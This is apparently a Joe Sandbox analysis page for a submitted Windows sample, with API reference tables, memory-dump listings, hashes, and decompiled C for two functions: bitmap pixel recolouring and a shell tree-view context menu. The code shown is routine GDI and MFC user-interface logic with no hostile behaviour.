0x00cc4974
0x00cc497b
0x00cc497c
0x00cc4984
0x00cc498b
0x00cc4993
0x00cc4997
0x00cc499d
0x00cc49a1
0x00cc49aa
0x00cc49af
0x00cc49af
0x00cc49b7
0x00cc49bf
0x00cc49c3
0x00cc49cb
0x00cc49d2
0x00cc49d2
0x00cc49d7
0x00cc49e0
0x00cc49e0
0x00cc49e2
0x00cc49e7
0x00cc49e7
0x00cc4a00
0x00cc4a18
0x00cc4a32
0x00cc4a32
0x00cc4a3c

APIs

__EH_prolog3.LIBCMT ref: 00CC44DE
PathRemoveFileSpecW.SHLWAPI(?,?), ref: 00CC45D2
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 00CC4609
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 00CC4636
_strlen.LIBCMT ref: 00CC4656
CoTaskMemFree.OLE32(?), ref: 00CC4663
PathRemoveFileSpecW.SHLWAPI(?), ref: 00CC4766
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 00CC4784
CoTaskMemFree.OLE32(?), ref: 00CC4792
_memcpy_s.LIBCMT ref: 00CC481E
PathRemoveFileSpecW.SHLWAPI(?), ref: 00CC4851
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 00CC4895
CoTaskMemFree.OLE32(?), ref: 00CC48A3
PathFindFileNameA.SHLWAPI(?), ref: 00CC4997
_strlen.LIBCMT ref: 00CC49A4
PathFindExtensionA.SHLWAPI(?), ref: 00CC49C3
_strlen.LIBCMT ref: 00CC49DA

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Path$ByteCharFileMultiWide$FreeRemoveSpecTask_strlen$Find$ExtensionH_prolog3Name_memcpy_s
String ID:
API String ID: 1872584338-0
Opcode ID: 8040ba05947b54f750dfb3aceb7da9fcf48e580b69fdeef74ee13707ab694718
Instruction ID: c00948470fd76b6a8bd33dd74554c0fc1b4de884d08829d77abca501a37a87d6
Opcode Fuzzy Hash: 8040ba05947b54f750dfb3aceb7da9fcf48e580b69fdeef74ee13707ab694718
Instruction Fuzzy Hash: E3126D71A0421AEFCB08DFA4CC95DAEB7B9FF49314B148159F855A73A1DB30AE05CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CDA45B Relevance: 25.9, APIs: 17, Instructions: 403
windowCOMMON

Download Yara Rule

C-Code - Quality: 60%

			E00CDA45B(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t166;
				int _t168;
				void* _t173;
				int _t176;
				long _t183;
				signed char _t184;
				long _t185;
				signed char _t203;
				unsigned int _t204;
				int _t207;
				int _t212;
				intOrPtr _t215;
				signed int _t220;
				void* _t228;
				signed int _t229;
				intOrPtr _t231;
				int _t232;
				void* _t234;
				signed int* _t235;
				int _t236;
				unsigned int* _t237;
				void* _t238;
				long long* _t239;
				long long _t265;
				long long _t267;
				long long _t270;
				long long _t276;
				long long _t278;
				long long _t281;

				_t206 = __ebx;
				_push(0x118);
				E00DDD55F(0xe0a610, __ebx, __edi, __esi);
				_t231 = __ecx;
				 *((intOrPtr*)(_t238 - 0x8c)) = __ecx;
				L00D0DE87(__fp0,  *((intOrPtr*)(_t238 + 8)), _t238 - 0xdc, _t238 - 0xfc, _t238 - 0xec);
				L00D0DE87(__fp0,  *((intOrPtr*)(_t238 + 0xc)), _t238 - 0xac, _t238 - 0xf4, _t238 - 0xe4);
				_t234 = 0x20;
				 *((long long*)(_t238 - 0xc4)) =  *((long long*)(_t238 - 0xac)) -  *((long long*)(_t238 - 0xdc));
				 *((long long*)(_t238 - 0xd4)) =  *((long long*)(_t238 - 0xe4)) -  *((long long*)(_t238 - 0xec));
				_t263 =  *((long long*)(_t238 - 0xf4)) -  *((long long*)(_t238 - 0xfc));
				 *((long long*)(_t238 - 0xcc)) =  *((long long*)(_t238 - 0xf4)) -  *((long long*)(_t238 - 0xfc));
				if( *((intOrPtr*)(_t231 + 8)) != _t234) {
					E00CB9032(_t238 - 0x88);
					 *(_t238 - 4) =  *(_t238 - 4) & 0x00000000;
					E00CB9B84(__ebx, _t238 - 0x88, CreateCompatibleDC(0));
					if(GetObjectA( *(_t231 + 0x8c), 0x18, _t238 - 0x124) == 0) {
						L71:
						E00CB91A4(_t238 - 0x88);
						L72:
						return E00DDD50E(_t206, _t231, _t234);
					}
					_t166 =  *(_t231 + 0x8c);
					if(_t166 == 0) {
						goto L71;
					}
					_t234 = SelectObject( *(_t238 - 0x84), _t166);
					if(_t234 == 0) {
						goto L71;
					}
					_t212 =  *(_t238 - 0x11c);
					_t168 =  *(_t238 - 0x120);
					 *(_t238 - 0x68) = _t168;
					 *(_t238 - 0x74) = _t212;
					_t206 = CreateCompatibleBitmap( *(_t238 - 0x84), _t168, _t212);
					 *(_t238 - 0x98) = _t206;
					if(_t206 != 0) {
						E00CB9032(_t238 - 0xbc);
						 *(_t238 - 4) = 1;
						E00CB9B84(_t206, _t238 - 0xbc, CreateCompatibleDC( *(_t238 - 0x84)));
						_t173 = SelectObject( *(_t238 - 0xb8), _t206);
						 *(_t238 - 0xa0) = _t173;
						if(_t173 != 0) {
							BitBlt( *(_t238 - 0xb8), 0, 0,  *(_t238 - 0x68),  *(_t238 - 0x74),  *(_t238 - 0x84), 0, 0, 0xcc0020);
							_t215 =  *((intOrPtr*)(_t231 + 0xa8));
							 *((intOrPtr*)(_t238 - 0x70)) = _t215;
							if(_t215 == 0xffffffff) {
								 *((intOrPtr*)(_t238 - 0x70)) =  *((intOrPtr*)(E00CC19ED() + 0x1c));
							}
							 *(_t238 - 0x6c) =  *(_t238 - 0x6c) & 0x00000000;
							_t176 =  *(_t238 - 0x68);
							if(_t176 <= 0) {
								L69:
								SelectObject( *(_t238 - 0xb8),  *(_t238 - 0xa0));
								SelectObject( *(_t238 - 0x84), _t234);
								DeleteObject( *(_t231 + 0x8c));
								_t235 = _t231 + 0x90;
								 *(_t231 + 0x8c) = _t206;
								E00CB83BD(_t231, _t235);
								 *_t235 =  *_t235 & 0x00000000;
								_t234 = _t231 + 0x94;
								E00CB83BD(_t231, _t234);
								 *_t234 =  *_t234 & 0x00000000;
								L70:
								E00CB91A4(_t238 - 0xbc);
								goto L71;
							} else {
								_t232 =  *(_t238 - 0x6c);
								 *(_t238 - 0x90) = _t234;
								_t236 =  *(_t238 - 0x74);
								do {
									_t207 = 0;
									if(_t236 <= 0) {
										goto L67;
									} else {
										goto L42;
									}
									do {
										L42:
										_t183 = GetPixel( *(_t238 - 0xb8), _t232, _t207);
										 *(_t238 - 0x6c) = _t183;
										if(_t183 ==  *((intOrPtr*)(_t238 - 0x70))) {
											goto L65;
										}
										_t184 = L00D0DE87(_t263, _t183, _t238 - 0x78, _t238 - 0x104, _t238 - 0x10c);
										_t265 =  *((long long*)(_t238 - 0x78)) +  *((long long*)(_t238 - 0xc4));
										asm("fld1");
										asm("fcom st0, st1");
										asm("fnstsw ax");
										asm("fldz");
										if((_t184 & 0x00000005) != 0) {
											L46:
											asm("fxch st0, st1");
											asm("fcom st0, st2");
											asm("fnstsw ax");
											if((_t184 & 0x00000005) != 0) {
												asm("fxch st0, st1");
												asm("fxch st0, st2");
											} else {
												st2 = _t265;
												asm("fxch st0, st1");
												asm("fxch st0, st2");
												asm("fxch st0, st1");
											}
											L48:
											_t267 =  *((long long*)(_t238 - 0x104)) +  *((long long*)(_t238 - 0xcc));
											asm("fcom st0, st2");
											asm("fnstsw ax");
											if((_t184 & 0x00000041) == 0) {
												L52:
												asm("fcom st0, st2");
												asm("fnstsw ax");
												if((_t184 & 0x00000041) == 0) {
													st0 = _t267;
												}
												L54:
												_t270 = st0 +  *((long long*)(_t238 - 0xd4));
												asm("fcom st0, st4");
												asm("fnstsw ax");
												if((_t184 & 0x00000041) == 0) {
													L57:
													st5 = _t270;
													asm("fxch st0, st3");
													asm("fcom st0, st4");
													asm("fnstsw ax");
													if((_t184 & 0x00000005) != 0) {
														st0 = _t270;
													} else {
														st4 = _t270;
													}
													L60:
													_t263 =  *0xe19bf8;
													asm("fcomp qword [ebp-0xac]");
													asm("fnstsw ax");
													if((_t184 & 0x00000005) != 0) {
														st2 = _t263;
														asm("fxch st0, st1");
														asm("fxch st0, st2");
														asm("fxch st0, st1");
													} else {
														st3 = _t263;
													}
													_t239 = _t239 - 0x18;
													asm("fxch st0, st2");
													 *((long long*)(_t239 + 0x10)) = _t263;
													 *((long long*)(_t239 + 8)) = _t263;
													 *_t239 = _t263;
													_t185 = E00D0CEE0(_t184, _t228);
													if( *(_t238 - 0x6c) != _t185) {
														SetPixel( *(_t238 - 0xb8), _t232, _t207, _t185);
													}
													goto L65;
												}
												asm("fcom st0, st5");
												asm("fnstsw ax");
												if((_t184 & 0x00000005) != 0) {
													goto L57;
												}
												st0 = _t270;
												st3 = _t270;
												goto L60;
											}
											asm("fcom st0, st3");
											asm("fnstsw ax");
											if((_t184 & 0x00000005) != 0) {
												goto L52;
											}
											st0 = _t267;
											goto L54;
										}
										asm("fcom st0, st2");
										asm("fnstsw ax");
										if((_t184 & 0x00000041) != 0) {
											goto L46;
										}
										st2 = _t265;
										goto L48;
										L65:
										_t207 = _t207 + 1;
									} while (_t207 < _t236);
									_t176 =  *(_t238 - 0x68);
									L67:
									_t232 = _t232 + 1;
								} while (_t232 < _t176);
								_t231 =  *((intOrPtr*)(_t238 - 0x8c));
								_t234 =  *(_t238 - 0x90);
								_t206 =  *(_t238 - 0x98);
								goto L69;
							}
						}
						SelectObject( *(_t238 - 0x84), _t234);
						DeleteObject(_t206);
						goto L70;
					}
					SelectObject( *(_t238 - 0x84), _t234);
					goto L71;
				}
				if(GetObjectA( *(_t231 + 0x8c), 0x54, _t238 - 0x64) != 0 &&  *((intOrPtr*)(_t238 - 0x52)) == _t234) {
					_t234 =  *(_t238 - 0x50);
					if(_t234 == 0) {
						goto L72;
					}
					_t220 =  *(_t238 - 0x5c);
					_t231 = 0;
					_t229 =  *(_t238 - 0x60);
					if(_t220 * _t229 > 0) {
						_t237 = _t234 + 2;
						do {
							if(_t237[0] == 0) {
								goto L28;
							}
							_t203 = L00D0DE87(_t263, (( *(_t237 - 2) & 0x000000ff) << 0x00000008 |  *(_t237 - 1) & 0x000000ff) << 0x00000008 |  *_t237 & 0x000000ff, _t238 - 0xa4, _t238 - 0x9c, _t238 - 0x94);
							_t276 =  *((long long*)(_t238 - 0xa4)) +  *((long long*)(_t238 - 0xc4));
							asm("fld1");
							asm("fcom st0, st1");
							asm("fnstsw ax");
							asm("fldz");
							if((_t203 & 0x00000005) != 0) {
								L10:
								asm("fxch st0, st1");
								asm("fcom st0, st2");
								asm("fnstsw ax");
								if((_t203 & 0x00000005) != 0) {
									asm("fxch st0, st1");
									asm("fxch st0, st2");
								} else {
									st2 = _t276;
									asm("fxch st0, st1");
									asm("fxch st0, st2");
									asm("fxch st0, st1");
								}
								L12:
								_t278 =  *((long long*)(_t238 - 0x9c)) +  *((long long*)(_t238 - 0xcc));
								asm("fcom st0, st2");
								asm("fnstsw ax");
								if((_t203 & 0x00000041) == 0) {
									L16:
									asm("fcom st0, st2");
									asm("fnstsw ax");
									if((_t203 & 0x00000041) == 0) {
										st0 = _t278;
									}
									L18:
									_t281 = st0 +  *((long long*)(_t238 - 0xd4));
									asm("fcom st0, st4");
									asm("fnstsw ax");
									if((_t203 & 0x00000041) == 0) {
										L21:
										st5 = _t281;
										asm("fxch st0, st3");
										asm("fcom st0, st4");
										asm("fnstsw ax");
										if((_t203 & 0x00000005) != 0) {
											st0 = _t281;
										} else {
											st4 = _t281;
										}
										L24:
										_t263 =  *0xe19bf8;
										asm("fcomp qword [ebp-0xac]");
										asm("fnstsw ax");
										if((_t203 & 0x00000005) != 0) {
											st2 = _t263;
											asm("fxch st0, st1");
											asm("fxch st0, st2");
											asm("fxch st0, st1");
										} else {
											st3 = _t263;
										}
										_t239 = _t239 - 0x18;
										asm("fxch st0, st2");
										 *((long long*)(_t239 + 0x10)) = _t263;
										 *((long long*)(_t239 + 8)) = _t263;
										 *_t239 = _t263;
										_t204 = E00D0CEE0(_t203, _t229);
										 *_t237 = _t204;
										 *(_t237 - 1) = _t204 >> 8;
										 *(_t237 - 2) = _t204 >> 0x10;
										_t220 =  *(_t238 - 0x5c);
										_t229 =  *(_t238 - 0x60);
										goto L28;
									}
									asm("fcom st0, st5");
									asm("fnstsw ax");
									if((_t203 & 0x00000005) != 0) {
										goto L21;
									}
									st4 = _t281;
									st3 = _t281;
									goto L24;
								}
								asm("fcom st0, st3");
								asm("fnstsw ax");
								if((_t203 & 0x00000005) != 0) {
									goto L16;
								} else {
									st0 = _t278;
									goto L18;
								}
							}
							asm("fcom st0, st2");
							asm("fnstsw ax");
							if((_t203 & 0x00000041) != 0) {
								goto L10;
							} else {
								st2 = _t276;
								goto L12;
							}
							L28:
							_t231 = _t231 + 1;
							_t237 =  &(_t237[1]);
						} while (_t231 < _t220 * _t229);
					}
				}
			}

0x00cda45b
0x00cda45b
0x00cda465
0x00cda46a
0x00cda46c
0x00cda48a
0x00cda4a7
0x00cda4ba
0x00cda4bb
0x00cda4cd
0x00cda4d9
0x00cda4df
0x00cda4e8
0x00cda682
0x00cda687
0x00cda69a
0x00cda6b6
0x00cda97c
0x00cda982
0x00cda987
0x00cda98c
0x00cda98c
0x00cda6bc
0x00cda6c4
0x00000000
0x00000000
0x00cda6d7
0x00cda6db
0x00000000
0x00000000
0x00cda6e1
0x00cda6e7
0x00cda6f5
0x00cda6f8
0x00cda701
0x00cda703
0x00cda70b
0x00cda725
0x00cda730
0x00cda741
0x00cda74d
0x00cda753
0x00cda75b
0x00cda793
0x00cda799
0x00cda79f
0x00cda7a5
0x00cda7af
0x00cda7af
0x00cda7b2
0x00cda7b6
0x00cda7bb
0x00cda922
0x00cda92e
0x00cda93b
0x00cda947
0x00cda94d
0x00cda953
0x00cda95a
0x00cda95f
0x00cda962
0x00cda969
0x00cda96e
0x00cda971
0x00cda977
0x00000000
0x00cda7c1
0x00cda7c1
0x00cda7c4
0x00cda7ca
0x00cda7cd
0x00cda7cd
0x00cda7d1
0x00000000
0x00000000
0x00000000
0x00000000
0x00cda7d7
0x00cda7d7
0x00cda7df
0x00cda7e5
0x00cda7eb
0x00000000
0x00000000
0x00cda804
0x00cda80c
0x00cda812
0x00cda814
0x00cda816
0x00cda818
0x00cda81d
0x00cda82e
0x00cda82e
0x00cda830
0x00cda832
0x00cda837
0x00cda867
0x00cda869
0x00cda839
0x00cda839
0x00cda83d
0x00cda83f
0x00cda841
0x00cda841
0x00cda843
0x00cda849
0x00cda84f
0x00cda851
0x00cda856
0x00cda86d
0x00cda86d
0x00cda86f
0x00cda874
0x00cda876
0x00cda878
0x00cda87a
0x00cda882
0x00cda888
0x00cda88a
0x00cda88f
0x00cda8a0
0x00cda8a0
0x00cda8a2
0x00cda8a4
0x00cda8a6
0x00cda8ab
0x00cda8b1
0x00cda8ad
0x00cda8ad
0x00cda8ad
0x00cda8b3
0x00cda8b3
0x00cda8b9
0x00cda8bf
0x00cda8c4
0x00cda8ca
0x00cda8cc
0x00cda8ce
0x00cda8d0
0x00cda8c6
0x00cda8c6
0x00cda8c6
0x00cda8d2
0x00cda8d5
0x00cda8d7
0x00cda8db
0x00cda8df
0x00cda8e2
0x00cda8ea
0x00cda8f5
0x00cda8f5
0x00000000
0x00cda8ea
0x00cda891
0x00cda893
0x00cda898
0x00000000
0x00000000
0x00cda89a
0x00cda89c
0x00000000
0x00cda89c
0x00cda858
0x00cda85a
0x00cda85f
0x00000000
0x00000000
0x00cda861
0x00000000
0x00cda863
0x00cda81f
0x00cda821
0x00cda826
0x00000000
0x00000000
0x00cda828
0x00000000
0x00cda8fb
0x00cda8fb
0x00cda8fc
0x00cda904
0x00cda907
0x00cda907
0x00cda908
0x00cda910
0x00cda916
0x00cda91c
0x00000000
0x00cda91c
0x00cda7bb
0x00cda764
0x00cda76b
0x00000000
0x00cda76b
0x00cda714
0x00000000
0x00cda714
0x00cda502
0x00cda512
0x00cda517
0x00000000
0x00000000
0x00cda51d
0x00cda520
0x00cda522
0x00cda52c
0x00cda532
0x00cda535
0x00cda539
0x00000000
0x00000000
0x00cda56a
0x00cda575
0x00cda57b
0x00cda57d
0x00cda57f
0x00cda581
0x00cda586
0x00cda597
0x00cda597
0x00cda599
0x00cda59b
0x00cda5a0
0x00cda5d0
0x00cda5d2
0x00cda5a2
0x00cda5a2
0x00cda5a6
0x00cda5a8
0x00cda5aa
0x00cda5aa
0x00cda5ac
0x00cda5b2
0x00cda5b8
0x00cda5ba
0x00cda5bf
0x00cda5d6
0x00cda5d6
0x00cda5d8
0x00cda5dd
0x00cda5df
0x00cda5e1
0x00cda5e3
0x00cda5eb
0x00cda5f1
0x00cda5f3
0x00cda5f8
0x00cda609
0x00cda609
0x00cda60b
0x00cda60d
0x00cda60f
0x00cda614
0x00cda61a
0x00cda616
0x00cda616
0x00cda616
0x00cda61c
0x00cda61c
0x00cda622
0x00cda628
0x00cda62d
0x00cda633
0x00cda635
0x00cda637
0x00cda639
0x00cda62f
0x00cda62f
0x00cda62f
0x00cda63b
0x00cda63e
0x00cda640
0x00cda644
0x00cda648
0x00cda64b
0x00cda652
0x00cda65a
0x00cda65d
0x00cda660
0x00cda663
0x00000000
0x00cda663
0x00cda5fa
0x00cda5fc
0x00cda601
0x00000000
0x00000000
0x00cda603
0x00cda605
0x00000000
0x00cda605
0x00cda5c1
0x00cda5c3
0x00cda5c8
0x00000000
0x00cda5ca
0x00cda5ca
0x00000000
0x00cda5cc
0x00cda5c8
0x00cda588
0x00cda58a
0x00cda58f
0x00000000
0x00cda591
0x00cda591
0x00000000
0x00cda593
0x00cda666
0x00cda668
0x00cda66c
0x00cda66f
0x00cda677
0x00cda52c

APIs

__EH_prolog3_GS.LIBCMT ref: 00CDA465
GetObjectA.GDI32(?,00000054,?), ref: 00CDA4FA
CreateCompatibleDC.GDI32(00000000), ref: 00CDA68D
GetObjectA.GDI32(?,00000018,?), ref: 00CDA6AE
SelectObject.GDI32(?,?), ref: 00CDA6D1
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00CDA6FB
SelectObject.GDI32(?,00000000), ref: 00CDA714
CreateCompatibleDC.GDI32(?), ref: 00CDA734
SelectObject.GDI32(?,00000000), ref: 00CDA74D
SelectObject.GDI32(?,00000000), ref: 00CDA764
DeleteObject.GDI32(00000000), ref: 00CDA76B
BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 00CDA793
GetPixel.GDI32(?,00000000,00000000), ref: 00CDA7DF
SetPixel.GDI32(?,00000000,00000000,00000000), ref: 00CDA8F5
SelectObject.GDI32(?,?), ref: 00CDA92E
SelectObject.GDI32(?,00000000), ref: 00CDA93B
DeleteObject.GDI32(?), ref: 00CDA947

Memory Dump Source

Source File: 00000000.00000002.506357478.0000000000CA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CA0000, based on PE: true

Associated: 00000000.00000002.506332792.0000000000CA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507292603.0000000000E17000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507423794.0000000000E68000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507430686.0000000000E6A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507471703.0000000000E85000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.507489751.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ca0000_dinhVFAbgo.jbxd

Similarity

API ID: Object$Select$CompatibleCreate$DeletePixel$BitmapH_prolog3_
String ID:
API String ID: 1136552931-0
Opcode ID: d7d93722abdd440b9fb2b55f672198bd6f62f749821b389e3ea0be331789a504
Instruction ID: fc4b3aec968e18b171e082681388f04618c6831fd4d2bfa3560ef6212e7ffb40
Opcode Fuzzy Hash: d7d93722abdd440b9fb2b55f672198bd6f62f749821b389e3ea0be331789a504
Instruction Fuzzy Hash: 9CE1C872E00615EADB266F50CD44BDDBB74FF00740F2085C5AAD5B22A1FB314E959F91

Uniqueness

Uniqueness Score: -1.00%

Function 00CD48F5 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 264
windowCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E00CD48F5(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, struct tagPOINT _a8, int _a12) {
				signed int _v4;
				signed int _v8;
				signed int _v16;
				struct tagPOINT _v24;
				long _v28;
				long _v32;
				signed int _v36;
				struct HWND__* _v40;
				int _v44;
				char _v45;
				struct HWND__* _v52;
				struct HWND__* _v56;
				intOrPtr _v60;
				struct HWND__* _v64;
				struct HWND__* _v68;
				int _v72;
				int _v76;
				struct HWND__* _v80;
				char _v84;
				int _v88;
				struct HWND__* _v120;
				void* _v124;
				void* _v272;
				char _v280;
				void* _v624;
				signed int _t89;
				int _t92;
				void* _t93;
				long _t98;
				void* _t102;
				void* _t106;
				void* _t108;
				void* _t109;
				void* _t110;
				void* _t111;
				signed int _t115;

				_t109 = __esi;
				_t106 = __edx;
				_t102 = __ecx;
				_t101 = __ebx;
				_push(0x70);
				E00DDD55F(0xe0a055, __ebx, __edi, __esi);
				_t108 = __ecx;
				if( *0xe870d0 != 0) {
					L40:
					return E00DDD50E(_t101, _t108, _t109);
				} else {
					__ebx = 0;
					__eflags =  *(__edi + 0x80);
					if(__eflags != 0) {
						__ecx = _a8.x;
						__eax = _a12;
						__eflags = __ecx - 0xffffffff;
						if(__ecx != 0xffffffff) {
							L13:
							_v24.y = __eax;
							__eax =  &_v24;
							_v24.x = __ecx;
							ScreenToClient( *(__edi + 0x20),  &_v24) =  &_v44;
							_v44 = __ebx;
							__ecx = __edi;
							__esi = E00CD776B(__edi, _v24.x, _v24.y,  &_v44);
							__eflags = __esi;
							if(__esi == 0) {
								goto L40;
							} else {
								goto L14;
							}
						} else {
							__eflags = __eax - 0xffffffff;
							if(__eax != 0xffffffff) {
								goto L13;
							} else {
								_v32 = 0;
								_v28 = 0;
								_v24.x = 0;
								_v24.y = 0;
								__esi = SendMessageA( *(__edi + 0x20), 0x110a, 9, 0);
								__eflags = __esi;
								if(__esi == 0) {
									goto L40;
								} else {
									__eax =  &_v32;
									__ecx = __edi;
									__eax = E00CD764D(__edi, __esi,  &_v32, 0);
									__eflags = __eax;
									if(__eax != 0) {
										__eax = _v32;
										_a8.x = _v32;
										_v24.y = _v24.y + 1;
										_a12 = _v24.y + 1;
										 &_a8 = ClientToScreen( *(__edi + 0x20),  &_a8);
									}
									L14:
									 &_v124 = E00DDFBE0(__edi,  &_v124, __ebx, 0x28);
									_v124 = 4;
									__eax =  &_v124;
									_v120 = __esi;
									__eax = SendMessageA( *(__edi + 0x20), 0x110c, __ebx,  &_v124);
									__eflags = __eax;
									if(__eax == 0) {
										goto L40;
									} else {
										__ebx = _v88;
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L40;
										} else {
											__ecx =  *__ebx;
											_v40 = __ecx;
											__eflags = __ecx;
											if(__ecx != 0) {
												__eax = __ecx->i;
												_push(__ecx);
												__esi =  *(__ecx->i + 4);
												__ecx = __esi;
												 *0xe17a64() = __esi->i();
												L20:
												__eflags = _v40;
												if(_v40 != 0) {
													__eax = GetParent( *(__edi + 0x20));
													__eax = E00CB277F(__ebx, __ecx, __edx, __eax);
													__eflags = __eax;
													if(__eax != 0) {
														__edx =  *(__eax + 0x20);
													} else {
														__edx = 0;
													}
													__ecx = _v40;
													_v36 = _v36 & 0x00000000;
													_v44 = __edx;
													__eax = __ecx->i;
													__esi =  *(__ecx->i + 0x28);
													__eax =  &_v36;
													__eax = __ebx + 8;
													__ecx = __esi;
													__eax =  *0xe17a64(__ecx, __edx, 1, __ebx + 8, 0xe3eeac, 0,  &_v36);
													__eax = __esi->i();
													__eflags = __eax;
													if(__eax >= 0) {
														__ebx = CreatePopupMenu();
														__eflags = __ebx;
														if(__ebx != 0) {
															__edx = _v36;
															__ecx = __edx->i;
															__esi =  *(__edx->i + 0xc);
															__ecx = __esi;
															__eax =  *0xe17a64(__edx, __ebx, 0, 1, 0x7fff, 4);
															__eax = __esi->i();
															__eflags = __eax;
															if(__eax >= 0) {
																__ecx = _v36;
																_push(0xe870d0);
																_push(0xe3ee9c);
																_push(__ecx);
																__eax = __ecx->i;
																__esi =  *(__ecx->i);
																__ecx = __esi;
																 *0xe17a64() = __esi->i();
																__esi =  *(__edi + 0x20);
																__ebx = TrackPopupMenu(__ebx, 0x102, _a8, _a12, 0, __esi, 0);
																__eax = IsWindow(__esi);
																__eflags = __eax;
																if(__eax != 0) {
																	__ecx =  *0xe870d0; // 0x0
																	__eflags = __ecx;
																	if(__ecx == 0) {
																		__esi = 0;
																		__eflags = 0;
																	} else {
																		__eax = __ecx->i;
																		_push(__ecx);
																		__esi =  *(__ecx->i + 8);
																		__ecx = __esi;
																		 *0xe17a64() = __esi->i();
																		__esi = 0;
																		 *0xe870d0 = 0;
																	}
																	__eflags = __ebx;
																	if(__eflags != 0) {
																		__ecx =  *(E00CACEEE(__ebx, __edi, __esi, __eflags) + 4);
																		__eax = E00CAFF34( *(E00CACEEE(__ebx, __edi, __esi, __eflags) + 4));
																		__ecx = _v36;
																		__eax = _v44;
																		_v76 = _v44;
																		_t61 = __ebx - 1; // -1
																		__eax = _t61;
																		_v72 = _t61;
																		_v80 = __esi;
																		_v68 = __esi;
																		_v64 = __esi;
																		_v56 = __esi;
																		_v52 = __esi;
																		_v84 = 0x24;
																		_v60 = 1;
																		__eax = __ecx->i;
																		_v4 = __esi;
																		__esi =  *(__ecx->i + 0x10);
																		__eax =  &_v84;
																		__ecx = __esi;
																		__eax =  *0xe17a64(__ecx,  &_v84);
																		__eax = __esi->i();
																		__eflags = __eax;
																		if(__eax >= 0) {
																			__eax = GetParent( *(__edi + 0x20));
																			__eax = E00CB277F(__ebx, __ecx, __edx, __eax);
																			__eflags = __eax;
																			if(__eax != 0) {
																				__eax = GetParent( *(__edi + 0x20));
																				__eax = SendMessageA( *(__eax + 0x20),  *0xe885cc, __ebx, 0);
																			}
																		}
																		__ecx = __edi;
																		__eax = E00CB7A0A(__ebx, __edi, __edx);
																		_t76 =  &_v4;
																		 *_t76 = _v4 | 0xffffffff;
																		__eflags =  *_t76;
																		__ecx =  &_v45;
																		__eax = E00CB0895( &_v45, __edx,  *_t76);
																	}
																}
															}
														}
														__ecx = _v36;
														__eflags = __ecx;
														if(__ecx != 0) {
															__eax = __ecx->i;
															_push(__ecx);
															__esi =  *(__ecx->i + 8);
															__ecx = __esi;
															 *0xe17a64() = __esi->i();
															_t81 =  &_v36;
															 *_t81 = _v36 & 0x00000000;
															__eflags =  *_t81;
														}
													}
													__ecx = _v40;
													__eflags = __ecx;
													if(__ecx != 0) {
														__eax = __ecx->i;
														_push(__ecx);
														__esi =  *(__ecx->i + 8);
														__ecx = __esi;
														 *0xe17a64() = __esi->i();
													}
												}
												goto L40;
											} else {
												__eax =  &_v40;
												__imp__SHGetDesktopFolder(__eax);
												__eflags = __eax;
												if(__eflags < 0) {
													__eax = E00CAA4E7(__ebx, __ecx, __edi, __esi, __eflags);
													asm("int3");
													_push(__esi);
													__esi = __ecx;
													__eax = E00CA1DDB(__eax);
													__eax = E00CACF3C(__ebx, __edi, __esi, __eflags);
													__eflags =  *(__eax + 0x14);
													if(__eflags != 0) {
														_pop(__esi);
														return __eax;
													} else {
														__ecx = __esi;
														_pop(__esi);
														_t113 = _t115;
														_t89 =  *0xe68dd4; // 0x8d2643c2
														_v16 = _t89 ^ _t115;
														_push(_t109);
														_t110 = _t102;
														_t92 = GetWindowsDirectoryA( &_v280, 0x104);
														if(_t92 != 0) {
															E00CD756B(_t101, _t102, _t106, _t108, _t110, _t121, SendMessageA( *(_t110 + 0x20), 0x1109, 0, _t98));
														}
														_t93 = E00CD4C21(_t101, _t110, _t108, _t121);
														_pop(_t111);
														return E00DDCBCE(_t93, _t101, _v8 ^ _t113, _t106, _t108, _t111);
													}
												} else {
													goto L20;
												}
											}
										}
									}
								}
							}
						}
					} else {
						__eax = E00CB236A(0, __ecx, __eflags);
						goto L40;
					}
				}
			}

0x00cd48f5
0x00cd48f5
0x00cd48f5
0x00cd48f5
0x00cd48f5
0x00cd48fc
0x00cd4901
0x00cd490a
0x00cd4bf6
0x00cd4bfb
0x00cd4910
0x00cd4910
0x00cd4912
0x00cd4918
0x00cd4924
0x00cd4927
0x00cd492a
0x00cd492d
0x00cd4988
0x00cd4988
0x00cd498b
0x00cd4992
0x00cd499b
0x00cd499e
0x00cd49a5
0x00cd49af
0x00cd49b1
0x00cd49b3
0x00000000
0x00000000
0x00000000
0x00000000
